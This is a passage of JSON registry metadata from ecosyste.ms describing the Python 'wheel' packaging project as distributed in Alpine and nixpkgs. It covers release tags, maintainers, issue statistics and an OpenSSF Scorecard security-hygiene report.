s_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0/manifests"},{"name":"0.10.3","sha":"7021b0ee2a51e5d9447d06038db58e9e597625f7","kind":"commit","published_at":"2012-10-03T22:55:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3/manifests"},{"name":"0.10.2","sha":"126aaacc9f24fa69b6b74d4e742f645f6bb65cf3","kind":"commit","published_at":"2012-10-03T01:11:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2/manifests"},{"name":"0.10.1","sha":"92e52e6745ec6b1178c2f42585c2f37ab04902a8","kind":"commit","published_at":"2012-10-01T02:52:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1/manifests"},{"name":"0.10.0","sha":"9ee6da6d6cab3fa171f2704df5f934474acc4aae","kind":"commit","published_at":"2012-10-01T02:20:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0/manifests"},{"name":"0.9.7","sha":"a118f5845570ebaf6566b8075dc1dcaf117d7d43","kind":"commit","published_at":"2012-09-20T15:52:36.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7/manifests"},{"name":"0.9.6","sha":"0c4752551e4fa1d4e9786fc874ae97edf52c0369","kind":"commit","published_at":"2012-09-20T01:46:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6/manifests"},{"name":"0.9.4","sha":"8db2d0d4760a0886998e3fca4206f5db3230d223","kind":"commit","published_at":"2012-09-11T12:32:56.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4/manifests"},{"name":"0.9.3","sha":"ca65be72feaf5ebe92ef4c9e91bd722360c1ad2c","kind":"commit","published_at":"2012-09-11T02:38:10.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3/manifests"},{"name":"0.9.1","sha":"6952bc635deb0afdf36c5f325aa166636f1c2a52","kind":"commit","published_at":"2012-08-28T23:07:55.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1/manifests"},{"name":"0.9","sha":"49b1d5dac1cdeaf98998b1e5bdb0e2cf134edff3","kind":"commit","published_at":"2012-08-23T03:08:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9","html_url":"https://github.com/pypa/wheel/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9/manifests"},{"name":"0.7","sha":"b2930f5f5d3c898389bdbdd7c854a0b9d320cf14","kind":"commit","published_at":"2012-07-28T12:12:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7/manifests"},{"name":"0.6","sha":"bdf9d5747a724664bd3588ab471907a900b45c9a","kind":"commit","published_at":"2012-07-23T16:26:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6/manifests"},{"name":"0.5","sha":"d02f91dceda7c4a16cc26ea80f0eecfff638e4b2","kind":"commit","published_at":"2012-07-17T16:23:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5/manifests"}]},"repo_metadata_updated_at":"2025-10-30T04:12:43.986Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":19.522199035763112,"stargazers_count":8.15283874217457,"forks_count":6.807224580844787,"average":8.620565589695618},"purl":"pkg:apk/alpine/py3-wheel-doc?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.13","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-wheel-doc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-wheel-doc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-wheel-doc/dependencies","status":null,"funding_links":["https://github.com/sponsors/pypa"],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-26T09:45:16.065Z","issues_count":109,"pull_requests_count":184,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2636588.9515151517,"issues_closed_count":98,"pull_requests_closed_count":165,"pull_request_authors_count":37,"issue_authors_count":90,"avg_comments_per_issue":5.908256880733945,"avg_comments_per_pull_request":3.5217391304347827,"merged_pull_requests_count":140,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":16,"past_year_pull_requests_count":34,"past_year_avg_time_to_close_issue":238596.63636363635,"past_year_avg_time_to_close_pull_request":890483.8846153846,"past_year_issues_closed_count":11,"past_year_pull_requests_closed_count":26,"past_year_pull_request_authors_count":11,"past_year_issue_authors_count":15,"past_year_avg_comments_per_issue":4.25,"past_year_avg_comments_per_pull_request":3.0588235294117645,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":8,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.13/packages/py3-wheel-doc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.13/packages/py3-wheel-doc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.13/packages/py3-wheel-doc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.13/packages/py3-wheel-doc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.13/packages/py3-wheel-doc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.13/packages/py3-wheel-doc/codemeta","maintainers":[{"uuid":"antoine.fontaine@epfl.ch","login":null,"name":"Antoine Fontaine","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Antoine Fontaine","packages_count":17,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Antoine Fontaine","role":null,"created_at":"2023-02-04T09:49:11.789Z","updated_at":"2023-02-04T09:49:11.789Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.13/maintainers/antoine.fontaine@epfl.ch/packages"}],"registry":{"name":"alpine-v3.13","url":"https://pkgs.alpinelinux.org/packages?branch=v3.13","ecosystem":"alpine","default":false,"packages_count":13897,"maintainers_count":231,"namespaces_count":2,"keywords_count":1898,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":592},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.734Z","updated_at":"2026-06-10T05:11:58.586Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.13/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.13/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.13/namespaces"}},{"id":12881081,"name":"python313Packages.wheel","ecosystem":"nixpkgs","description":"Built-package format for Python","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":["python"],"namespace":null,"versions_count":1,"first_release_published_at":"2026-01-27T05:50:06.167Z","latest_release_published_at":"2026-01-27T05:50:06.167Z","latest_release_number":"0.46.1","last_synced_at":"2026-03-07T20:20:47.511Z","created_at":"2026-01-27T05:50:05.921Z","updated_at":"2026-03-07T21:31:08.610Z","registry_url":"https://search.nixos.org/packages?channel=unstable\u0026query=python313Packages.wheel","install_command":"nix-env -iA nixpkgs.python313Packages.wheel","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-unstable/pkgs/development/python-modules/wheel/default.nix#L29","metadata":{"nix_attribute":"python3.13-wheel-0.46.1","position":"pkgs/development/python-modules/wheel/default.nix:29","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","aarch64-darwin","aarch64-windows","x86_64-windows","i686-windows","i686-freebsd","x86_64-freebsd","aarch64-freebsd"],"broken":false,"insecure":false,"unfree":false,"outputs":["dist","out"],"upstream_ecosystem":"pypi","upstream_name":"wheel","upstream_purl":"pkg:pypi/wheel"},"repo_metadata":{},"repo_metadata_updated_at":null,"dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/python313Packages.wheel?channel=unstable","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/python313Packages.wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/python313Packages.wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/python313Packages.wheel/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python313Packages.wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python313Packages.wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python313Packages.wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python313Packages.wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python313Packages.wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python313Packages.wheel/codemeta","maintainers":[{"uuid":"siriobalmelli","login":null,"name":"Sirio Balmelli","email":"sirio@b-ad.ch","url":"https://github.com/siriobalmelli","packages_count":32,"html_url":null,"role":null,"created_at":"2026-03-07T20:20:47.724Z","updated_at":"2026-03-07T20:20:47.724Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/maintainers/siriobalmelli/packages"}],"registry":{"name":"nixpkgs-unstable","url":"https://channels.nixos.org/nixos-unstable","ecosystem":"nixpkgs","default":true,"packages_count":148656,"maintainers_count":4717,"namespaces_count":0,"keywords_count":2908,"github":"NixOS","metadata":{"funded_packages_count":1599},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:52.762Z","updated_at":"2026-06-10T05:16:03.119Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/namespaces"}},{"id":6213847,"name":"py3-wheel-doc","ecosystem":"alpine","description":"A built-package format for Python (documentation)","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2020-04-12T09:28:46.000Z","latest_release_published_at":"2020-04-12T09:28:46.000Z","latest_release_number":"0.34.2-r1","last_synced_at":"2026-04-02T15:22:34.799Z","created_at":"2023-02-01T03:09:28.604Z","updated_at":"2026-04-02T15:22:34.800Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.12/main/x86_64/py3-wheel-doc","install_command":"apk add py3-wheel-doc","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2025-10-06T19:13:50.000Z","size":1827,"stargazers_count":539,"open_issues_count":14,"forks_count":171,"subscribers_count":30,"default_branch":"main","last_synced_at":"2025-10-30T00:35:00.752Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2025-10-29T13:00:22.000Z","dependencies_parsed_at":"2024-02-03T11:27:24.404Z","dependency_job_id":"c444d7cc-5eb9-412d-b647-9474b7b4096f","html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":68,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/publish.yml:31"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":5,"reason":"SAST tool is not run on all commits -- score normalized to 5","details":["Warn: 6 commits out of 12 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-22T20:33:25.724Z","repository_id":23174547,"created_at":"2025-08-22T20:33:25.724Z","updated_at":"2025-08-22T20:33:25.724Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281742688,"owners_count":26553720,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-30T02:00:06.501Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pypa","name":"Python Packaging Authority","uuid":"647025","kind":"organization","description":"","email":"info@pypa.io","website":"https://www.pypa.io","location":"United States of America","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/647025?v=4","repositories_count":58,"last_synced_at":"2025-10-30T00:34:30.821Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/pypa","funding_links":["https://github.com/sponsors/pypa"],"total_stars":88807,"followers":2132,"following":0,"created_at":"2022-11-02T16:21:37.826Z","updated_at":"2025-10-30T00:34:30.821Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa/repositories"},"tags":[{"name":"0.46.1","sha":"7a0ea7f7c3dd73747e37368bb074cd0d9fb49259","kind":"commit","published_at":"2025-04-08T20:53:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1/manifests"},{"name":"0.46.0","sha":"1da658384bbfc14c091085bb98828e68368a1ed5","kind":"commit","published_at":"2025-04-03T09:39:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0/manifests"},{"name":"0.45.1","sha":"7855525de4093257e7bfb434877265e227356566","kind":"commit","published_at":"2024-11-23T00:14:12.000Z","downl